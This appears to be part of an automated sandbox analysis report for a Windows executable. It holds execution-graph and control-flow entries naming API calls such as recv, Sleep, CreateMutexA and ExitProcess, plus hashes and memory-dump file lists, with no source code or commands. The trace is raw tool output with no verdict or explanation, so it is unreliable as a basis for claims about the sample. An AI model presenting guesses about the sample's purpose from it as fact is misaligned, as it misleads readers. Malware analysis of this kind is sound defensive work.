                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722030765.0000000000ED0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722052434.0000000000EDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1722076202.0000000000EDF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                                                                                                                                              • Opcode ID: f7a69e3c36b67b73fb8de821edd93448079351187558747778cd82135bb8f506
                                                                                                                                                                                                                                                              • Instruction ID: 58378874b46d5cce09bbcb6c85cb4b6683b0878034dbbd5167749e1e7da74d7e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7a69e3c36b67b73fb8de821edd93448079351187558747778cd82135bb8f506
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF210C75A0011AAFDF00EFA4D881ABEFBB9EF08710F5140A6F501A7351EB709D459BA0

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:0.9%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                                              Total number of Nodes:596
                                                                                                                                                                                                                                                              Total number of Limit Nodes:4
                                                                                                                                                                                                                                                              execution_graph 9669 ed6629 9672 ed64c7 9669->9672 9673 ed64d5 __cftof 9672->9673 9674 ed6520 9673->9674 9677 ed652b 9673->9677 9676 ed652a 9683 eda302 GetPEB 9677->9683 9679 ed6535 9680 ed653a GetPEB 9679->9680 9681 ed654a __cftof 9679->9681 9680->9681 9682 ed6562 ExitProcess 9681->9682 9684 eda31c __cftof 9683->9684 9684->9679 10083 ea5cad 10085 ea5caf shared_ptr __cftof 10083->10085 10084 ea5d17 shared_ptr __floor_pentium4 10085->10084 10086 ea5c10 3 API calls 10085->10086 10087 ea66ac 10086->10087 10088 ea5c10 3 API calls 10087->10088 10089 ea66b1 10088->10089 10090 ea22c0 3 API calls 10089->10090 10091 ea66c9 shared_ptr 10090->10091 10092 ea5c10 3 API calls 10091->10092 10093 ea673d 10092->10093 10094 ea22c0 3 API calls 10093->10094 10096 ea6757 shared_ptr 10094->10096 10095 ea5c10 3 API calls 10095->10096 10096->10095 10097 ea22c0 3 API calls 10096->10097 10098 ea6852 shared_ptr __floor_pentium4 10096->10098 10097->10096 10099 ea20a0 10100 ebc68b __Mtx_init_in_situ 2 API calls 10099->10100 10101 ea20ac 10100->10101 10267 ea3fe0 10268 ea4022 10267->10268 10269 ea408c 10268->10269 10270 ea40d2 10268->10270 10273 ea4035 __floor_pentium4 10268->10273 10274 ea35e0 10269->10274 10280 ea3ee0 10270->10280 10275 ea3616 10274->10275 10279 ea364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 10275->10279 10286 ea2ce0 10275->10286 10277 ea369e 10277->10279 10295 ea2c00 10277->10295 10279->10273 10282 ea3f48 10280->10282 10284 ea3f1e 10280->10284 10281 ea3f58 10281->10273 10282->10281 10283 ea2c00 3 API calls 10282->10283 10285 ea3f7f 10283->10285 10284->10273 10285->10273 10287 ea2d1d 10286->10287 10288 ebbedf InitOnceExecuteOnce 10287->10288 10289 ea2d46 10288->10289 10290 ea2d51 __floor_pentium4 10289->10290 10291 ea2d88 10289->10291 10302 ebbef7 10289->10302 10290->10277 10293 ea2440 3 API calls 10291->10293 10294 ea2d9b 10293->10294 10294->10277 10296 ea2c0e 10295->10296 10315 ebb847 10296->10315 10298 ea2c42 10299 ea2c49 10298->10299 10321 ea2c80 10298->10321 10299->10279 10301 ea2c58 std::_Throw_future_error 10303 ebbf03 std::_Throw_future_error 10302->10303 10304 ebbf6a 10303->10304 10305 ebbf73 10303->10305 10309 ebbe7f 10304->10309 10306 ea2ae0 4 API calls 10305->10306 10308 ebbf6f 10306->10308 10308->10291 10310 ebcc31 InitOnceExecuteOnce 10309->10310 10311 ebbe97 10310->10311 10312 ebbe9e 10311->10312 10313 ed6cbb 3 API calls 10311->10313 10312->10308 10314 ebbea7 10313->10314 10314->10308 10316 ebb854 10315->10316 10320 ebb873 Concurrency::details::_Reschedule_chore 10315->10320 10324 ebcb77 10316->10324 10318 ebb864 10318->10320 10326 ebb81e 10318->10326 10320->10298 10332 ebb7fb 10321->10332 10323 ea2cb2 shared_ptr 10323->10301 10325 ebcb92 CreateThreadpoolWork 10324->10325 10325->10318 10327 ebb827 Concurrency::details::_Reschedule_chore 10326->10327 10330 ebcdcc 10327->10330 10329 ebb841 10329->10320 10331 ebcde1 TpPostWork 10330->10331 10331->10329 10333 ebb817 10332->10333 10334 ebb807 10332->10334 10333->10323 10334->10333 10336 ebca78 10334->10336 10337 ebca8d TpReleaseWork 10336->10337 10337->10333 10423 ea4120 10424 ea416a 10423->10424 10425 ea3ee0 3 API calls 10424->10425 10426 ea41b2 __floor_pentium4 10424->10426 10425->10426 10353 ea9ba5 10354 ea9ba7 10353->10354 10355 ea5c10 3 API calls 10354->10355 10356 ea9cb1 10355->10356 10357 ea8b30 3 API calls 10356->10357 10358 ea9cc2 10357->10358 10102 ea9ab8 10104 ea9acc 10102->10104 10105 ea9b08 10104->10105 10106 ea5c10 3 API calls 10105->10106 10107 ea9b7c 10106->10107 10108 ea8b30 3 API calls 10107->10108 10109 ea9b8d 10108->10109 10110 ea5c10 3 API calls 10109->10110 10111 ea9cb1 10110->10111 10112 ea8b30 3 API calls 10111->10112 10113 ea9cc2 10112->10113 10220 eacc79 10222 eacc84 shared_ptr 10220->10222 10221 eaccda shared_ptr __floor_pentium4 10222->10221 10223 ea5c10 3 API calls 10222->10223 10224 eace9d 10223->10224 10226 eaca70 10224->10226 10228 eacadd 10226->10228 10227 eaccda shared_ptr __floor_pentium4 10229 ea5c10 3 API calls 10228->10229 10233 eacc87 10228->10233 10230 eaccf9 10229->10230 10236 ea9030 10230->10236 10232 ea5c10 3 API calls 10234 eace9d 10232->10234 10233->10227 10233->10232 10235 eaca70 3 API calls 10234->10235 10237 ea9080 10236->10237 10238 ea5c10 3 API calls 10237->10238 10239 ea909a shared_ptr __floor_pentium4 10238->10239 10239->10233 10359 ed8bbe 10360 ed8868 3 API calls 10359->10360 10361 ed8bdc 10360->10361 10114 ea42b0 10117 ea3ac0 10114->10117 10116 ea42bb shared_ptr 10118 ea3af9 10117->10118 10121 ea3c38 10118->10121 10123 ea3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10118->10123 10127 ea32d0 10118->10127 10120 ea32d0 5 API calls 10124 ea3c5f 10120->10124 10121->10120 10121->10124 10122 ea3c68 10122->10116 10123->10116 10124->10122 10144 ea3810 10124->10144 10128 ebc6ac GetSystemTimePreciseAsFileTime 10127->10128 10131 ea3314 10128->10131 10129 ebc26a 4 API calls 10130 ea333c __Mtx_unlock 10129->10130 10132 ebc26a 4 API calls 10130->10132 10133 ea3350 __floor_pentium4 10130->10133 10131->10129 10131->10130 10134 ea3377 10132->10134 10133->10121 10135 ebc6ac GetSystemTimePreciseAsFileTime 10134->10135 10136 ea33af 10135->10136 10137 ebc26a 4 API calls 10136->10137 10138 ea33b6 10136->10138 10137->10138 10139 ebc26a 4 API calls 10138->10139 10140 ea33d7 __Mtx_unlock 10138->10140 10139->10140 10141 ebc26a 4 API calls 10140->10141 10142 ea33eb 10140->10142 10143 ea340e 10141->10143 10142->10121 10143->10121 10145 ea381c 10144->10145 10148 ea2440 10145->10148 10151 ebb5d6 10148->10151 10150 ea2472 10152 ebb5f1 std::_Throw_future_error 10151->10152 10153 ed8bec __cftof 3 API calls 10152->10153 10155 ebb658 __cftof __floor_pentium4 10152->10155 10154 ebb69f 10153->10154 10155->10150 10338 ea55f0 10339 ea5610 10338->10339 10340 ea22c0 3 API calls 10339->10340 10341 ea5710 __floor_pentium4 10339->10341 10340->10339 10342 ea43f0 10343 ebbedf InitOnceExecuteOnce 10342->10343 10344 ea440a 10343->10344 10345 ea4411 10344->10345 10346 ed6cbb 3 API calls 10344->10346 10347 ea4424 10346->10347 10374 ea3970 10375 ebc68b __Mtx_init_in_situ 2 API calls 10374->10375 10376 ea39a7 10375->10376 10377 ebc68b __Mtx_init_in_situ 2 API calls 10376->10377 10378 ea39e6 10377->10378 10379 ea2170 10382 ebc6fc 10379->10382 10381 ea217a 10384 ebc70c 10382->10384 10385 ebc724 10382->10385 10384->10385 10386 ebcfbe 10384->10386 10385->10381 10387 ebccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10386->10387 10388 ebcfd0 10387->10388 10388->10384 9690 eb9ef0 9691 eb9f0c 9690->9691 9694 ebc68b 9691->9694 9693 eb9f17 9697 ebc3d5 9694->9697 9696 ebc69b 9696->9693 9698 ebc3e1 9697->9698 9699 ebc3eb 9697->9699 9700 ebc39e 9698->9700 9701 ebc3be 9698->9701 9699->9696 9700->9699 9706 ebccd5 9700->9706 9710 ebcd0a 9701->9710 9703 ebc3d0 9703->9696 9707 ebcce3 InitializeCriticalSectionEx 9706->9707 9709 ebc3b7 9706->9709 9707->9709 9709->9696 9711 ebcd1f RtlInitializeConditionVariable 9710->9711 9711->9703 10240 ea4276 10241 ea2410 4 API calls 10240->10241 10242 ea427f 10241->10242 10156 ea3c8e 10157 ea3c98 10156->10157 10159 ea3ca5 10157->10159 10164 ea2410 10157->10164 10160 ea3810 3 API calls 10159->10160 10161 ea3ccf 10160->10161 10162 ea3810 3 API calls 10161->10162 10163 ea3cdb shared_ptr 10162->10163 10165 ea2424 10164->10165 10168 ebb52d 10165->10168 10176 ed3aed 10168->10176 10170 ea242a 10170->10159 10171 ebb5a5 ___std_exception_copy 10183 ebb1ad 10171->10183 10172 ebb598 10179 ebaf56 10172->10179 10187 ed4f29 10176->10187 10178 ebb555 10178->10170 10178->10171 10178->10172 10180 ebaf9f ___std_exception_copy 10179->10180 10182 ebafb2 shared_ptr 10180->10182 10193 ebb39f 10180->10193 10182->10170 10184 ebb1d8 10183->10184 10186 ebb1e1 shared_ptr 10183->10186 10185 ebb39f 4 API calls 10184->10185 10185->10186 10186->10170 10188 ed4f2e __cftof 10187->10188 10188->10178 10189 edd634 __cftof 3 API calls 10188->10189 10192 ed8bfc __cftof 10188->10192 10189->10192 10190 ed65ed __cftof 3 API calls 10191 ed8c2f 10190->10191 10192->10190 10194 ebbedf InitOnceExecuteOnce 10193->10194 10195 ebb3e1 10194->10195 10196 ebb3e8 10195->10196 10204 ed6cbb 10195->10204 10196->10182 10205 ed6cc7 __dosmaperr 10204->10205 10206 eda671 __cftof 3 API calls 10205->10206 10209 ed6ccc 10206->10209 10207 ed8bec __cftof 3 API calls 10208 ed6cf6 10207->10208 10209->10207 10243 ed6a44 10244 ed6a5c 10243->10244 10245 ed6a52 10243->10245 10248 ed698d 10244->10248 10247 ed6a76 ___free_lconv_mon 10249 ed690a __cftof 3 API calls 10248->10249 10250 ed699f 10249->10250 10250->10247 9715 eae0c0 recv 9716 eae122 recv 9715->9716 9717 eae157 recv 9716->9717 9719 eae191 9717->9719 9718 eae2b3 __floor_pentium4 9719->9718 9724 ebc6ac 9719->9724 9731 ebc452 9724->9731 9726 eae2ee 9727 ebc26a 9726->9727 9728 ebc292 9727->9728 9729 ebc274 9727->9729 9728->9728 9729->9728 9748 ebc297 9729->9748 9732 ebc4a8 9731->9732 9734 ebc47a __floor_pentium4 9731->9734 9732->9734 9737 ebcf6b 9732->9737 9734->9726 9735 ebc4fd __Xtime_diff_to_millis2 9735->9734 9736 ebcf6b _xtime_get GetSystemTimePreciseAsFileTime 9735->9736 9736->9735 9738 ebcf7a 9737->9738 9740 ebcf87 __aulldvrm 9737->9740 9738->9740 9741 ebcf44 9738->9741 9740->9735 9744 ebcbea 9741->9744 9745 ebcbfb GetSystemTimePreciseAsFileTime 9744->9745 9746 ebcc07 9744->9746 9745->9746 9746->9740 9751 ea2ae0 9748->9751 9750 ebc2ae std::_Throw_future_error 9758 ebbedf 9751->9758 9753 ea2af4 __dosmaperr 9753->9750 9761 eda671 9753->9761 9772 ebcc31 9758->9772 9765 eda67b __dosmaperr ___free_lconv_mon 9761->9765 9762 ed6ccc 9766 ed8bec 9762->9766 9763 ed8bec __cftof 3 API calls 9764 eda72d 9763->9764 9765->9762 9765->9763 9767 ed8bf1 __cftof 9766->9767 9771 ed8bfc __cftof 9767->9771 9776 edd634 9767->9776 9790 ed65ed 9771->9790 9773 ebcc3f InitOnceExecuteOnce 9772->9773 9775 ebbef2 9772->9775 9773->9775 9775->9753 9778 edd640 __cftof __dosmaperr 9776->9778 9777 edd69c __cftof __dosmaperr 9777->9771 9778->9777 9779 edd81b __dosmaperr 9778->9779 9780 edd726 9778->9780 9781 edd751 __cftof 9778->9781 9782 ed65ed __cftof 3 API calls 9779->9782 9780->9781 9793 edd62b 9780->9793 9781->9777 9785 eda671 __cftof 3 API calls 9781->9785 9788 edd7a5 9781->9788 9783 edd82e 9782->9783 9785->9788 9787 edd62b __cftof 3 API calls 9787->9781 9788->9777 9789 eda671 __cftof 3 API calls 9788->9789 9789->9777 9791 ed64c7 __cftof 3 API calls 9790->9791 9792 ed65fe 9791->9792 9794 eda671 __cftof 3 API calls 9793->9794 9795 edd630 9794->9795 9795->9787 9796 ea2ec0 9797 ea2f06 9796->9797 9802 ea2f6f 9796->9802 9798 ebc6ac GetSystemTimePreciseAsFileTime 9797->9798 9799 ea2f12 9798->9799 9800 ea301e 9799->9800 9806 ea2f1d __Mtx_unlock 9799->9806 9803 ebc26a 4 API calls 9800->9803 9801 ea2fef 9802->9801 9807 ebc6ac GetSystemTimePreciseAsFileTime 9802->9807 9804 ea3024 9803->9804 9805 ebc26a 4 API calls 9804->9805 9808 ea2fb9 9805->9808 9806->9802 9806->9804 9807->9808 9809 ebc26a 4 API calls 9808->9809 9810 ea2fc0 __Mtx_unlock 9808->9810 9809->9810 9811 ebc26a 4 API calls 9810->9811 9812 ea2fd8 9810->9812 9811->9812 9812->9801 9813 ebc26a 4 API calls 9812->9813 9814 ea303c 9813->9814 9815 ebc6ac GetSystemTimePreciseAsFileTime 9814->9815 9819 ea3080 shared_ptr __Mtx_unlock 9815->9819 9816 ea315f 9817 ebc26a 4 API calls 9816->9817 9821 ea31d1 9816->9821 9827 ea3193 __Mtx_unlock 9816->9827 9818 ea31cb 9817->9818 9820 ebc26a 4 API calls 9818->9820 9819->9816 9819->9818 9824 ea31a7 __floor_pentium4 9819->9824 9826 ebc6ac GetSystemTimePreciseAsFileTime 9819->9826 9820->9821 9822 ebc26a 4 API calls 9821->9822 9822->9827 9823 ebc26a 4 API calls 9825 ea31dd 9823->9825 9826->9816 9827->9823 9827->9824 10258 ea2e00 10259 ea2e28 10258->10259 10260 ebc68b __Mtx_init_in_situ 2 API calls 10259->10260 10261 ea2e33 10260->10261 10362 ea8980 10364 ea8aea 10362->10364 10365 ea89d8 shared_ptr 10362->10365 10363 ea5c10 3 API calls 10363->10365 10365->10363 10365->10364 9828 ebd0c7 9830 ebd0d6 9828->9830 9829 ebd17f 9830->9829 9831 ebd17b RtlWakeAllConditionVariable 9830->9831 10251 ea3c47 10252 ea3c51 10251->10252 10254 ea32d0 5 API calls 10252->10254 10255 ea3c5f 10252->10255 10253 ea3c68 10254->10255 10255->10253 10256 ea3810 3 API calls 10255->10256 10257 ea3cdb shared_ptr 10256->10257 10415 ea9f44 10417 ea9f4c shared_ptr 10415->10417 10416 eaa953 Sleep CreateMutexA 10419 eaa98e 10416->10419 10417->10416 10418 eaa01f shared_ptr 10417->10418 10420 ea215a 10421 ebc6fc InitializeCriticalSectionEx 10420->10421 10422 ea2164 10421->10422 10366 ea3f9f 10367 ea3fad 10366->10367 10368 ea3fb6 10366->10368 10369 ea2410 4 API calls 10367->10369 10369->10368 9832 ea9adc 9833 ea9aea 9832->9833 9836 ea9afe shared_ptr 9832->9836 9834 eaa917 9833->9834 9833->9836 9835 eaa953 Sleep CreateMutexA 9834->9835 9837 eaa98e 9835->9837 9846 ea5c10 9836->9846 9839 ea9b7c 9864 ea8b30 9839->9864 9841 ea9b8d 9842 ea5c10 3 API calls 9841->9842 9843 ea9cb1 9842->9843 9844 ea8b30 3 API calls 9843->9844 9845 ea9cc2 9844->9845 9847 ea5c54 9846->9847 9874 ea4b30 9847->9874 9849 ea5d17 shared_ptr __floor_pentium4 9849->9839 9850 ea5c7b shared_ptr __cftof 9850->9849 9851 ea5c10 3 API calls 9850->9851 9852 ea66ac 9851->9852 9853 ea5c10 3 API calls 9852->9853 9854 ea66b1 9853->9854 9878 ea22c0 9854->9878 9856 ea66c9 shared_ptr 9857 ea5c10 3 API calls 9856->9857 9858 ea673d 9857->9858 9859 ea22c0 3 API calls 9858->9859 9861 ea6757 shared_ptr 9859->9861 9860 ea5c10 3 API calls 9860->9861 9861->9860 9862 ea22c0 3 API calls 9861->9862 9863 ea6852 shared_ptr __floor_pentium4 9861->9863 9862->9861 9863->9839 9865 ea8b7c 9864->9865 9866 ea5c10 3 API calls 9865->9866 9868 ea8b97 shared_ptr 9866->9868 9867 ea8d01 shared_ptr __floor_pentium4 9867->9841 9868->9867 9869 ea5c10 3 API calls 9868->9869 9871 ea8d9a shared_ptr 9869->9871 9870 ea8e7e shared_ptr __floor_pentium4 9870->9841 9871->9870 9872 ea5c10 3 API calls 9871->9872 9873 ea8f1a shared_ptr __floor_pentium4 9872->9873 9873->9841 9875 ea4b92 9874->9875 9877 ea4ce5 9874->9877 9875->9877 9881 ed6da6 9875->9881 9877->9850 9967 ea2280 9878->9967 9882 ed6db4 9881->9882 9884 ed6dc2 9881->9884 9886 ed6d19 9882->9886 9884->9875 9891 ed690a 9886->9891 9890 ed6d3d 9890->9875 9892 ed692a 9891->9892 9898 ed6921 9891->9898 9893 eda671 __cftof 3 API calls 9892->9893 9892->9898 9894 ed694a 9893->9894 9905 edb5fb 9894->9905 9899 ed6d52 9898->9899 9900 ed6d8f 9899->9900 9901 ed6d5f 9899->9901 9959 edb67d 9900->9959 9903 ed6d6e 9901->9903 9954 edb6a1 9901->9954 9903->9890 9906 edb60e 9905->9906 9907 ed6960 9905->9907 9906->9907 9913 edf5ab 9906->9913 9909 edb628 9907->9909 9910 edb63b 9909->9910 9911 edb650 9909->9911 9910->9911 9920 ede6b1 9910->9920 9911->9898 9914 edf5b7 __dosmaperr 9913->9914 9915 eda671 __cftof 3 API calls 9914->9915 9917 edf5c0 __cftof __dosmaperr 9915->9917 9916 edf606 9916->9907 9917->9916 9918 ed8bec __cftof 3 API calls 9917->9918 9919 edf62b 9918->9919 9921 eda671 __cftof 3 API calls 9920->9921 9922 ede6bb 9921->9922 9925 ede5c9 9922->9925 9924 ede6c1 9924->9911 9926 ede5d5 __cftof __dosmaperr ___free_lconv_mon 9925->9926 9927 ede5f6 9926->9927 9928 ed8bec __cftof 3 API calls 9926->9928 9927->9924 9929 ede668 9928->9929 9930 ede6a4 9929->9930 9934 eda72e 9929->9934 9930->9924 9938 eda739 __dosmaperr ___free_lconv_mon 9934->9938 9935 ed8bec __cftof 3 API calls 9936 eda7c7 9935->9936 9937 eda7be 9939 ede4b0 9937->9939 9938->9935 9938->9937 9940 ede5c9 __cftof 3 API calls 9939->9940 9941 ede4c3 9940->9941 9946 ede259 9941->9946 9943 ede4cb __cftof 9945 ede4dc __cftof __dosmaperr ___free_lconv_mon 9943->9945 9949 ede6c4 9943->9949 9945->9930 9947 ed690a __cftof GetPEB ExitProcess GetPEB 9946->9947 9948 ede26b 9947->9948 9948->9943 9950 ede259 __cftof GetPEB ExitProcess GetPEB 9949->9950 9953 ede6e4 __cftof 9950->9953 9951 ede75a __cftof __floor_pentium4 9951->9945 9952 ede32f __cftof GetPEB ExitProcess GetPEB 9952->9951 9953->9951 9953->9952 9955 ed690a __cftof 3 API calls 9954->9955 9956 edb6be 9955->9956 9958 edb6ce __floor_pentium4 9956->9958 9964 edf1bf 9956->9964 9958->9903 9960 eda671 __cftof 3 API calls 9959->9960 9961 edb688 9960->9961 9962 edb5fb __cftof 3 API calls 9961->9962 9963 edb698 9962->9963 9963->9903 9965 ed690a __cftof 3 API calls 9964->9965 9966 edf1df __cftof __freea __floor_pentium4 9965->9966 9966->9958 9968 ea2296 9967->9968 9971 ed87f8 9968->9971 9974 ed7609 9971->9974 9973 ea22a4 9973->9856 9975 ed7649 9974->9975 9979 ed7631 __cftof __dosmaperr __floor_pentium4 9974->9979 9976 ed690a __cftof 3 API calls 9975->9976 9975->9979 9977 ed7661 9976->9977 9980 ed7bc4 9977->9980 9979->9973 9982 ed7bd5 9980->9982 9981 ed7be4 __cftof __dosmaperr 9981->9979 9982->9981 9987 ed8168 9982->9987 9992 ed7dc2 9982->9992 9997 ed7de8 9982->9997 10007 ed7f36 9982->10007 9988 ed8178 9987->9988 9989 ed8171 9987->9989 9988->9982 10016 ed7b50 9989->10016 9991 ed8177 9991->9982 9993 ed7dcb 9992->9993 9995 ed7dd2 9992->9995 9994 ed7b50 3 API calls 9993->9994 9996 ed7dd1 9994->9996 9995->9982 9996->9982 9998 ed7e09 __cftof __dosmaperr 9997->9998 9999 ed7def 9997->9999 9998->9982 9999->9998 10000 ed7f69 9999->10000 10002 ed7fa2 9999->10002 10005 ed7f77 9999->10005 10000->10005 10006 ed7f8b 10000->10006 10034 ed8241 10000->10034 10002->10006 10030 ed8390 10002->10030 10005->10006 10038 ed86ea 10005->10038 10006->9982 10008 ed7f69 10007->10008 10011 ed7f4f 10007->10011 10010 ed7f8b 10008->10010 10012 ed8241 3 API calls 10008->10012 10014 ed7f77 10008->10014 10009 ed7fa2 10009->10010 10013 ed8390 3 API calls 10009->10013 10010->9982 10011->10008 10011->10009 10011->10014 10012->10014 10013->10014 10014->10010 10015 ed86ea 3 API calls 10014->10015 10015->10010 10017 ed7b62 __dosmaperr 10016->10017 10020 ed8ab6 10017->10020 10019 ed7b85 __dosmaperr 10019->9991 10021 ed8ad1 10020->10021 10024 ed8868 10021->10024 10023 ed8adb 10023->10019 10025 ed887a 10024->10025 10026 ed690a __cftof GetPEB ExitProcess GetPEB 10025->10026 10027 ed888f __cftof __dosmaperr 10025->10027 10029 ed88bf 10026->10029 10027->10023 10028 ed6d52 GetPEB ExitProcess GetPEB 10028->10029 10029->10027 10029->10028 10032 ed83ab 10030->10032 10031 ed83dd 10031->10005 10032->10031 10042 edc88e 10032->10042 10035 ed825a 10034->10035 10049 edd3c8 10035->10049 10037 ed830d 10037->10005 10037->10037 10039 ed875d __floor_pentium4 10038->10039 10041 ed8707 10038->10041 10039->10006 10040 edc88e __cftof 3 API calls 10040->10041 10041->10039 10041->10040 10045 edc733 10042->10045 10044 edc8a6 10044->10031 10046 edc743 10045->10046 10047 ed690a __cftof GetPEB ExitProcess GetPEB 10046->10047 10048 edc748 __cftof __dosmaperr 10046->10048 10047->10048 10048->10044 10052 edd3ee 10049->10052 10061 edd3d8 __cftof __dosmaperr 10049->10061 10050 edd485 10054 edd4ae 10050->10054 10055 edd4e4 10050->10055 10051 edd48a 10062 edcbdf 10051->10062 10052->10050 10052->10051 10052->10061 10057 edd4cc 10054->10057 10058 edd4b3 10054->10058 10079 edcef8 10055->10079 10075 edd0e2 10057->10075 10068 edd23e 10058->10068 10061->10037 10063 edcbf1 10062->10063 10064 ed690a __cftof GetPEB ExitProcess GetPEB 10063->10064 10065 edcc05 10064->10065 10066 edcef8 GetPEB ExitProcess GetPEB 10065->10066 10067 edcc0d __alldvrm __cftof __dosmaperr _strrchr 10065->10067 10066->10067 10067->10061 10071 edd26c 10068->10071 10069 edd2a5 10069->10061 10070 edd2de 10072 edcf9a GetPEB ExitProcess GetPEB 10070->10072 10071->10069 10071->10070 10073 edd2b7 10071->10073 10072->10069 10074 edd16d GetPEB ExitProcess GetPEB 10073->10074 10074->10069 10076 edd10f 10075->10076 10077 edd16d GetPEB ExitProcess GetPEB 10076->10077 10078 edd14e 10076->10078 10077->10078 10078->10061 10080 edcf10 10079->10080 10081 edcf75 10080->10081 10082 edcf9a GetPEB ExitProcess GetPEB 10080->10082 10081->10061 10082->10081 10370 ea2b90 10371 ea2bce 10370->10371 10372 ebb7fb TpReleaseWork 10371->10372 10373 ea2bdb shared_ptr __floor_pentium4 10372->10373 10446 ebd111 10448 ebd122 10446->10448 10447 ebd12a 10448->10447 10450 ebd199 10448->10450 10451 ebd1a7 SleepConditionVariableCS 10450->10451 10453 ebd1c0 10450->10453 10451->10453 10453->10448 10454 ea2b10 10455 ea2b1a 10454->10455 10456 ea2b1c 10454->10456 10457 ebc26a 4 API calls 10456->10457 10458 ea2b22 10457->10458 9685 eaa856 9687 eaa870 9685->9687 9688 eaa892 shared_ptr 9685->9688 9686 eaa953 Sleep CreateMutexA 9689 eaa98e 9686->9689 9687->9686 9687->9688

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 342 ed652b-ed6538 call eda302 345 ed655a-ed656c call ed656d ExitProcess 342->345 346 ed653a-ed6548 GetPEB 342->346 346->345 347 ed654a-ed6559 346->347 347->345
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32(?,?,00ED652A,?,?,?,?,?,00ED7661), ref: 00ED6567
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741454272.0000000000EA0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741470474.0000000000F02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741528812.0000000000F09000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741545129.0000000000F0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741563886.0000000000F15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741652929.0000000000F16000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741682720.0000000000F17000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741822098.0000000001074000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741858006.0000000001076000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741903885.0000000001088000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741924804.000000000108A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.000000000108B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741949219.0000000001096000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1741997744.0000000001098000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742023104.000000000109D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742046018.000000000109E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742073517.00000000010A0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742101257.00000000010A9000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742129433.00000000010AB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742148924.00000000010AC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742170855.00000000010B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742194060.00000000010C5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742213925.00000000010C7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742231945.00000000010D0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742249608.00000000010D9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742270250.00000000010EE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742291913.00000000010F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.1742310037.00000000010FA000.00000080.00000001.01000000.00000008.sdmpDownload File
